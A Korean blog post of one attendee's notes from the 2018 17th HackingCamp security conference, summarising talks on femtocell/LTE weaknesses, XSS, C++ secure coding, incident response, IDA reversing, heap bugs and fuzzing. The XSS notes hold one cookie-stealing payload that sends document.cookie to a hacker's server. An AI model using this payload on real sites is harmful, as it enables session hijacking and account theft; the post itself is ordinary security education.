-
[2018] 17th HackingCampfkillrra ?/conference 2018. 2. 27. 03:34
2018년 2월 24일(토) ~ 25일(일)
2일간 PoC가 주관하는 17th 해킹캠프에 다녀왔습니다.
3번정도를 지원한것같네요. ㅎㅎ..ㅎㅎ..
발표를 들으면서 정리한 내용입니다.
[1일차]
[정진욱(POCSEC), 해킹캠프]
keynote
[심준보, 핵알못 vs 핵잘알]
해킹 공부 순서
핵알못 vs 핵잘알(천재처럼하는 해커) -> 차이 : 어떤 자세로 임하는가 (해킹을 대하는 자세) ==> 대회 or etc.. 순위를 결정함
원래 해커의 기본 소양 -> 해킹을 못하더라도 공부 자체에 만족 -> 결국 해킹을 잘하게 된다.
따라하는것은 해킹이 아니다.
해킹 기법을 만드는 사람이 훌륭한 해커다.
결론 : 즐겨라~
[신정훈, LTE? is it secure?]
無 에서 有를 창조
LTE 네트워크
펨토셀 벤더들
펨토셀이란?
- 작은 기지국
- Gap Filler
음영 지역 해소 목적으로 만들어짐
-> 여의도 불꽃 놀이때 핸드폰 안터지는 현상
-> 산 or 시골가면 LTE 바가 사라짐
이런 지역을 음영 지역이라고 함.
10~12m 범위
쉽게 모바일 장비를 스니핑할 수 있다.
펨토셀에 연결된 모바일 장비 조작
but 한국에서는 펨토셀 장비를 개인에게 팔지않음 -> 개발중이기 때문
찾아가기..
LTE Network ->all over IP
사용자들이 IP만 알면 접속 가능
How to hack?
갓글링..
결론 : 펨토셀의 크리티컬한 취약점 2개로 어마무시한 일까지 가능하다.
[김도현, 초보탈출 시스템 해킹]
직접 만들어보면 취약점이 어디서 터질지 예상이 가능하다.
원리를 알면 취약점이 보임.
vm 같은거 만들어보기
[박광호, 문제풀이로 배우는 XSS]
location.href=URL(해커의 서버)+document.cookie; -> 쿠키값 가져오기.
[2일차]
[옥찬호, C++ 시큐어코딩 v2]
good....god..
integer overflow // 범위 넘기면 overflow
[박문범, Incident Response vs Digital Forensics]
* Digital Forensic을 위한 필요 역량
증거의 법리적 적합성과 절차적 정당성에 대한 분석 능력
-> 법을 잘 알아야한다.
* Incident Response의 절차와 기술적 방법론
수집 및 탐지 -> 분석 및 협의 -> 전파 및 발령 -> 대응 및 복구
침해사고 대응 및 분석 절차
- 국내 민간부문에서 발생하는 침해사고 전담
- 피해 시스템의 로그 및 악성코드를 분석하여 공격자의 행위를 재구성 하는 것이 목적
- 유사 사고의 재발방지, 확인된 취약점에 대한 보완 건고 등
침해사고 대응 단계별 기술적 행위
- 사고 전 중비 : 사고가 발생하기 전 조직적인 대응 준비
- 사고 탐지 : 정보보호 및 네트워크 장비상의 이상징후 탐지
관리자에 의한 침해사고 식별
- 초기 대응 -> 가장 중요 : 사고 정황에 대한 기본적인 세부사항 기록
침해사고 대응 단계별 기술적 행위
사전조사 -> 침해사고 분석 -> 결과 보고 -> 사후 처리
[차현수, IDA로 리버싱 해보기]
<IDA 유용한 기능>
정적 분석 프로그램 중 가장 강력
기계어 코드라면 다 올릴 수 있음
함수 리스트 , 전체적인 control 그래프 등,,
유용한 기능
Xref - ctrl + x
FLIRT - 심볼 지워진 경우의 심볼을 복구 해준다.
Remote Debugging(원격 디버깅) : 멀어웨어 분석, 다른 운영체제, 안드로이드, ios 디버깅
플러그인
<hex-rays decompiler> : 어셈블리 -> c 코드 // but 너무 맹신하지는 말자. 참고용
<ponce>
<IDAPython> : 자동으로 딸려오는 플러그인 , 디버깅하면서 스크립팅할 수 있다. 문자열을 복호화해서 가져올때
IDA 플러그인 contest한다.
python 공부 tip : 다른 사람들이 짠 스크립트 처보고 분석하는 식으로 공부하면 빨리 익힐 수 있다.
[황호, 힙찔이?ㄴㄴ 힙합플레이야]
힙이란?
프로그램이 실행되는 도중에 동적으로 할당되는 메모리
heap corruption
힙에 대해 쉽게 배울 수 있는 사이트 : how2heap
[김낙현, 매쓰보이와 함께하는 취약점 분석 여행기]
good + 어린 친구가 정말 잘하는 구나..
[Network protocol fuzzing]
파일 퍼저 vs 네트워크 퍼저
파일 -> 패킷
구현하기 어려움 -> 패킷내용 다양
프로그램의 특정 상태를 구분짓는게 힘들다.
Remote 제어 프로그램
반응형'fkillrra ? > conference' 카테고리의 다른 글
[2018] CodeEngn Conference STAFF 후기 (0) 2018.08.14 [2018] 11th CODEGATE (0) 2018.04.11 [2018] 코드게이트 해킹 시연 동영상 공모전 - 장려상 (2) 2018.03.25 [2017] HDCON (0) 2017.11.26